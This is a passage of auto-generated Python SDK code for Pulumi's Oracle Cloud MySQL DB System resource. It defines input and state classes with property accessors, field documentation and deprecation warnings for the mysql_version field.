warnings.warn("""The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""", DeprecationWarning)
pulumi.log.warn("""mysql_version is deprecated: The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""")
if mysql_version is not None:
pulumi.set(__self__, "mysql_version", mysql_version)
if port is not None:
pulumi.set(__self__, "port", port)
if port_x is not None:
pulumi.set(__self__, "port_x", port_x)
if shutdown_type is not None:
pulumi.set(__self__, "shutdown_type", shutdown_type)
if source is not None:
pulumi.set(__self__, "source", source)
if state is not None:
pulumi.set(__self__, "state", state)
@property
@pulumi.getter(name="adminPassword")
def admin_password(self) -> pulumi.Input[str]:
"""
The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
"""
return pulumi.get(self, "admin_password")
@admin_password.setter
def admin_password(self, value: pulumi.Input[str]):
pulumi.set(self, "admin_password", value)
@property
@pulumi.getter(name="adminUsername")
def admin_username(self) -> pulumi.Input[str]:
"""
The username for the administrative user.
"""
return pulumi.get(self, "admin_username")
@admin_username.setter
def admin_username(self, value: pulumi.Input[str]):
pulumi.set(self, "admin_username", value)
@property
@pulumi.getter(name="availabilityDomain")
def availability_domain(self) -> pulumi.Input[str]:
"""
The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
"""
return pulumi.get(self, "availability_domain")
@availability_domain.setter
def availability_domain(self, value: pulumi.Input[str]):
pulumi.set(self, "availability_domain", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
The OCID of the compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="shapeName")
def shape_name(self) -> pulumi.Input[str]:
"""
The name of the shape. The shape determines the resources allocated
* CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
"""
return pulumi.get(self, "shape_name")
@shape_name.setter
def shape_name(self, value: pulumi.Input[str]):
pulumi.set(self, "shape_name", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Input[str]:
"""
The OCID of the subnet the DB System is associated with.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: pulumi.Input[str]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="backupPolicy")
def backup_policy(self) -> Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']]:
"""
(Updatable) Backup policy as optionally used for DB System Creation.
"""
return pulumi.get(self, "backup_policy")
@backup_policy.setter
def backup_policy(self, value: Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']]):
pulumi.set(self, "backup_policy", value)
@property
@pulumi.getter(name="configurationId")
def configuration_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the Configuration to be used for this DB System.
"""
return pulumi.get(self, "configuration_id")
@configuration_id.setter
def configuration_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "configuration_id", value)
@property
@pulumi.getter(name="dataStorageSizeInGb")
def data_storage_size_in_gb(self) -> Optional[pulumi.Input[int]]:
"""
Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
"""
return pulumi.get(self, "data_storage_size_in_gb")
@data_storage_size_in_gb.setter
def data_storage_size_in_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_storage_size_in_gb", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) User-provided data about the DB System.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The user-friendly name for the DB System. It does not have to be unique.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="faultDomain")
def fault_domain(self) -> Optional[pulumi.Input[str]]:
"""
The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
"""
return pulumi.get(self, "fault_domain")
@fault_domain.setter
def fault_domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fault_domain", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="hostnameLabel")
def hostname_label(self) -> Optional[pulumi.Input[str]]:
"""
The hostname for the primary endpoint of the DB System. Used for DNS.
"""
return pulumi.get(self, "hostname_label")
@hostname_label.setter
def hostname_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hostname_label", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="isHighlyAvailable")
def is_highly_available(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Specifies if the DB System is highly available.
"""
return pulumi.get(self, "is_highly_available")
@is_highly_available.setter
def is_highly_available(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_highly_available", value)
@property
@pulumi.getter
def maintenance(self) -> Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']]:
"""
(Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
"""
return pulumi.get(self, "maintenance")
@maintenance.setter
def maintenance(self, value: Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']]):
pulumi.set(self, "maintenance", value)
@property
@pulumi.getter(name="mysqlVersion")
def mysql_version(self) -> Optional[pulumi.Input[str]]:
"""
Name of the MySQL Version in use for the DB System.
"""
return pulumi.get(self, "mysql_version")
@mysql_version.setter
def mysql_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mysql_version", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The port for primary endpoint of the DB System to listen on.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="portX")
def port_x(self) -> Optional[pulumi.Input[int]]:
"""
The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
"""
return pulumi.get(self, "port_x")
@port_x.setter
def port_x(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port_x", value)
@property
@pulumi.getter(name="shutdownType")
def shutdown_type(self) -> Optional[pulumi.Input[str]]:
"""
It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
"""
return pulumi.get(self, "shutdown_type")
@shutdown_type.setter
def shutdown_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "shutdown_type", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input['MysqlDbSystemSourceArgs']]:
"""
Parameters detailing how to provision the initial data of the system.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input['MysqlDbSystemSourceArgs']]):
pulumi.set(self, "source", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@pulumi.input_type
class _MysqlDbSystemState:
def __init__(__self__, *,
admin_password: Optional[pulumi.Input[str]] = None,
admin_username: Optional[pulumi.Input[str]] = None,
analytics_cluster: Optional[pulumi.Input['MysqlDbSystemAnalyticsClusterArgs']] = None,
availability_domain: Optional[pulumi.Input[str]] = None,
backup_policy: Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']] = None,
channels: Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemChannelArgs']]]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
current_placement: Optional[pulumi.Input['MysqlDbSystemCurrentPlacementArgs']] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoints: Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemEndpointArgs']]]] = None,
fault_domain: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
heat_wave_cluster: Optional[pulumi.Input['MysqlDbSystemHeatWaveClusterArgs']] = None,
hostname_label: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
is_analytics_cluster_attached: Optional[pulumi.Input[bool]] = None,
is_heat_wave_cluster_attached: Optional[pulumi.Input[bool]] = None,
is_highly_available: Optional[pulumi.Input[bool]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
maintenance: Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']] = None,
mysql_version: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
port_x: Optional[pulumi.Input[int]] = None,
shape_name: Optional[pulumi.Input[str]] = None,
shutdown_type: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input['MysqlDbSystemSourceArgs']] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering MysqlDbSystem resources.
:param pulumi.Input[str] admin_password: The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
:param pulumi.Input[str] admin_username: The username for the administrative user.
:param pulumi.Input['MysqlDbSystemAnalyticsClusterArgs'] analytics_cluster: DEPRECATED -- please use HeatWave API instead. A summary of an Analytics Cluster.
:param pulumi.Input[str] availability_domain: The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
:param pulumi.Input['MysqlDbSystemBackupPolicyArgs'] backup_policy: (Updatable) Backup policy as optionally used for DB System Creation.
:param pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemChannelArgs']]] channels: A list with a summary of all the Channels attached to the DB System.
:param pulumi.Input[str] compartment_id: The OCID of the compartment.
:param pulumi.Input[str] configuration_id: The OCID of the Configuration to be used for this DB System.
:param pulumi.Input['MysqlDbSystemCurrentPlacementArgs'] current_placement: The availability domain and fault domain a DB System is placed in.
:param pulumi.Input[int] data_storage_size_in_gb: Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] description: (Updatable) User-provided data about the DB System.
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the DB System. It does not have to be unique.
:param pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemEndpointArgs']]] endpoints: The network endpoints available for this DB System.
:param pulumi.Input[str] fault_domain: The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input['MysqlDbSystemHeatWaveClusterArgs'] heat_wave_cluster: A summary of a HeatWave cluster.
:param pulumi.Input[str] hostname_label: The hostname for the primary endpoint of the DB System. Used for DNS.
:param pulumi.Input[str] ip_address: The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
:param pulumi.Input[bool] is_analytics_cluster_attached: DEPRECATED -- please use `isHeatWaveClusterAttached` instead. If the DB System has an Analytics Cluster attached.
:param pulumi.Input[bool] is_heat_wave_cluster_attached: If the DB System has a HeatWave Cluster attached.
:param pulumi.Input[bool] is_highly_available: (Updatable) Specifies if the DB System is highly available.
:param pulumi.Input[str] lifecycle_details: Additional information about the current lifecycleState.
:param pulumi.Input['MysqlDbSystemMaintenanceArgs'] maintenance: (Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
:param pulumi.Input[str] mysql_version: Name of the MySQL Version in use for the DB System.
:param pulumi.Input[int] port: The port for primary endpoint of the DB System to listen on.
:param pulumi.Input[int] port_x: The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
:param pulumi.Input[str] shape_name: The name of the shape. The shape determines the resources allocated
* CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
:param pulumi.Input[str] shutdown_type: It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
:param pulumi.Input['MysqlDbSystemSourceArgs'] source: Parameters detailing how to provision the initial data of the system.
:param pulumi.Input[str] state: (Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
:param pulumi.Input[str] subnet_id: The OCID of the subnet the DB System is associated with.
:param pulumi.Input[str] time_created: The date and time the DB System was created.
:param pulumi.Input[str] time_updated: The time the DB System was last updated.
"""
if admin_password is not None:
pulumi.set(__self__, "admin_password", admin_password)
if admin_username is not None:
pulumi.set(__self__, "admin_username", admin_username)
if analytics_cluster is not None:
pulumi.set(__self__, "analytics_cluster", analytics_cluster)
if availability_domain is not None:
pulumi.set(__self__, "availability_domain", availability_domain)
if backup_policy is not None:
pulumi.set(__self__, "backup_policy", backup_policy)
if channels is not None:
pulumi.set(__self__, "channels", channels)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if configuration_id is not None:
pulumi.set(__self__, "configuration_id", configuration_id)
if current_placement is not None:
pulumi.set(__self__, "current_placement", current_placement)
if data_storage_size_in_gb is not None:
pulumi.set(__self__, "data_storage_size_in_gb", data_storage_size_in_gb)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if endpoints is not None:
pulumi.set(__self__, "endpoints", endpoints)
if fault_domain is not None:
pulumi.set(__self__, "fault_domain", fault_domain)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if heat_wave_cluster is not None:
pulumi.set(__self__, "heat_wave_cluster", heat_wave_cluster)
if hostname_label is not None:
pulumi.set(__self__, "hostname_label", hostname_label)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if is_analytics_cluster_attached is not None:
pulumi.set(__self__, "is_analytics_cluster_attached", is_analytics_cluster_attached)
if is_heat_wave_cluster_attached is not None:
pulumi.set(__self__, "is_heat_wave_cluster_attached", is_heat_wave_cluster_attached)
if is_highly_available is not None:
pulumi.set(__self__, "is_highly_available", is_highly_available)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if maintenance is not None:
pulumi.set(__self__, "maintenance", maintenance)
if mysql_version is not None:
warnings.warn("""The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""", DeprecationWarning)
pulumi.log.warn("""mysql_version is deprecated: The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""")
if mysql_version is not None:
pulumi.set(__self__, "mysql_version", mysql_version)
if port is not None:
pulumi.set(__self__, "port", port)
if port_x is not None:
pulumi.set(__self__, "port_x", port_x)
if shape_name is not None:
pulumi.set(__self__, "shape_name", shape_name)
if shutdown_type is not None:
pulumi.set(__self__, "shutdown_type", shutdown_type)
if source is not None:
pulumi.set(__self__, "source", source)
if state is not None:
pulumi.set(__self__, "state", state)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_updated is not None:
pulumi.set(__self__, "time_updated", time_updated)
@property
@pulumi.getter(name="adminPassword")
def admin_password(self) -> Optional[pulumi.Input[str]]:
"""
The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
"""
return pulumi.get(self, "admin_password")
@admin_password.setter
def admin_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "admin_password", value)
@property
@pulumi.getter(name="adminUsername")
def admin_username(self) -> Optional[pulumi.Input[str]]:
"""
The username for the administrative user.
"""
return pulumi.get(self, "admin_username")
@admin_username.setter
def admin_username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "admin_username", value)
@property
@pulumi.getter(name="analyticsCluster")
def analytics_cluster(self) -> Optional[pulumi.Input['MysqlDbSystemAnalyticsClusterArgs']]:
"""
DEPRECATED -- please use HeatWave API instead. A summary of an Analytics Cluster.
"""
return pulumi.get(self, "analytics_cluster")
@analytics_cluster.setter
def analytics_cluster(self, value: Optional[pulumi.Input['MysqlDbSystemAnalyticsClusterArgs']]):
pulumi.set(self, "analytics_cluster", value)
@property
@pulumi.getter(name="availabilityDomain")
def availability_domain(self) -> Optional[pulumi.Input[str]]:
"""
The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
"""
return pulumi.get(self, "availability_domain")
@availability_domain.setter
def availability_domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "availability_domain", value)
@property
@pulumi.getter(name="backupPolicy")
def backup_policy(self) -> Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']]:
"""
(Updatable) Backup policy as optionally used for DB System Creation.
"""
return pulumi.get(self, "backup_policy")
@backup_policy.setter
def backup_policy(self, value: Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']]):
pulumi.set(self, "backup_policy", value)
@property
@pulumi.getter
def channels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemChannelArgs']]]]:
"""
A list with a summary of all the Channels attached to the DB System.
"""
return pulumi.get(self, "channels")
@channels.setter
def channels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemChannelArgs']]]]):
pulumi.set(self, "channels", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="configurationId")
def configuration_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the Configuration to be used for this DB System.
"""
return pulumi.get(self, "configuration_id")
@configuration_id.setter
def configuration_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "configuration_id", value)
@property
@pulumi.getter(name="currentPlacement")
def current_placement(self) -> Optional[pulumi.Input['MysqlDbSystemCurrentPlacementArgs']]:
"""
The availability domain and fault domain a DB System is placed in.
"""
return pulumi.get(self, "current_placement")
@current_placement.setter
def current_placement(self, value: Optional[pulumi.Input['MysqlDbSystemCurrentPlacementArgs']]):
pulumi.set(self, "current_placement", value)
@property
@pulumi.getter(name="dataStorageSizeInGb")
def data_storage_size_in_gb(self) -> Optional[pulumi.Input[int]]:
"""
Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
"""
return pulumi.get(self, "data_storage_size_in_gb")
@data_storage_size_in_gb.setter
def data_storage_size_in_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_storage_size_in_gb", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) User-provided data about the DB System.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The user-friendly name for the DB System. It does not have to be unique.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemEndpointArgs']]]]:
"""
The network endpoints available for this DB System.
"""
return pulumi.get(self, "endpoints")
@endpoints.setter
def endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MysqlDbSystemEndpointArgs']]]]):
pulumi.set(self, "endpoints", value)
@property
@pulumi.getter(name="faultDomain")
def fault_domain(self) -> Optional[pulumi.Input[str]]:
"""
The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
"""
return pulumi.get(self, "fault_domain")
@fault_domain.setter
def fault_domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fault_domain", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="heatWaveCluster")
def heat_wave_cluster(self) -> Optional[pulumi.Input['MysqlDbSystemHeatWaveClusterArgs']]:
"""
A summary of a HeatWave cluster.
"""
return pulumi.get(self, "heat_wave_cluster")
@heat_wave_cluster.setter
def heat_wave_cluster(self, value: Optional[pulumi.Input['MysqlDbSystemHeatWaveClusterArgs']]):
pulumi.set(self, "heat_wave_cluster", value)
@property
@pulumi.getter(name="hostnameLabel")
def hostname_label(self) -> Optional[pulumi.Input[str]]:
"""
The hostname for the primary endpoint of the DB System. Used for DNS.
"""
return pulumi.get(self, "hostname_label")
@hostname_label.setter
def hostname_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hostname_label", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="isAnalyticsClusterAttached")
def is_analytics_cluster_attached(self) -> Optional[pulumi.Input[bool]]:
"""
DEPRECATED -- please use `isHeatWaveClusterAttached` instead. If the DB System has an Analytics Cluster attached.
"""
return pulumi.get(self, "is_analytics_cluster_attached")
@is_analytics_cluster_attached.setter
def is_analytics_cluster_attached(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_analytics_cluster_attached", value)
@property
@pulumi.getter(name="isHeatWaveClusterAttached")
def is_heat_wave_cluster_attached(self) -> Optional[pulumi.Input[bool]]:
"""
If the DB System has a HeatWave Cluster attached.
"""
return pulumi.get(self, "is_heat_wave_cluster_attached")
@is_heat_wave_cluster_attached.setter
def is_heat_wave_cluster_attached(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_heat_wave_cluster_attached", value)
@property
@pulumi.getter(name="isHighlyAvailable")
def is_highly_available(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Specifies if the DB System is highly available.
"""
return pulumi.get(self, "is_highly_available")
@is_highly_available.setter
def is_highly_available(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_highly_available", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
Additional information about the current lifecycleState.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter
def maintenance(self) -> Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']]:
"""
(Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
"""
return pulumi.get(self, "maintenance")
@maintenance.setter
def maintenance(self, value: Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']]):
pulumi.set(self, "maintenance", value)
@property
@pulumi.getter(name="mysqlVersion")
def mysql_version(self) -> Optional[pulumi.Input[str]]:
"""
Name of the MySQL Version in use for the DB System.
"""
return pulumi.get(self, "mysql_version")
@mysql_version.setter
def mysql_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mysql_version", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The port for primary endpoint of the DB System to listen on.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="portX")
def port_x(self) -> Optional[pulumi.Input[int]]:
"""
The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
"""
return pulumi.get(self, "port_x")
@port_x.setter
def port_x(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port_x", value)
@property
@pulumi.getter(name="shapeName")
def shape_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the shape. The shape determines the resources allocated
* CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
"""
return pulumi.get(self, "shape_name")
@shape_name.setter
def shape_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "shape_name", value)
@property
@pulumi.getter(name="shutdownType")
def shutdown_type(self) -> Optional[pulumi.Input[str]]:
"""
It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
"""
return pulumi.get(self, "shutdown_type")
@shutdown_type.setter
def shutdown_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "shutdown_type", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input['MysqlDbSystemSourceArgs']]:
"""
Parameters detailing how to provision the initial data of the system.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input['MysqlDbSystemSourceArgs']]):
pulumi.set(self, "source", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the subnet the DB System is associated with.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The date and time the DB System was created.
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> Optional[pulumi.Input[str]]:
"""
The time the DB System was last updated.
"""
return pulumi.get(self, "time_updated")
@time_updated.setter
def time_updated(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_updated", value)
class MysqlDbSystem(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_password: Optional[pulumi.Input[str]] = None,
admin_username: Optional[pulumi.Input[str]] = None,
availability_domain: Optional[pulumi.Input[str]] = None,
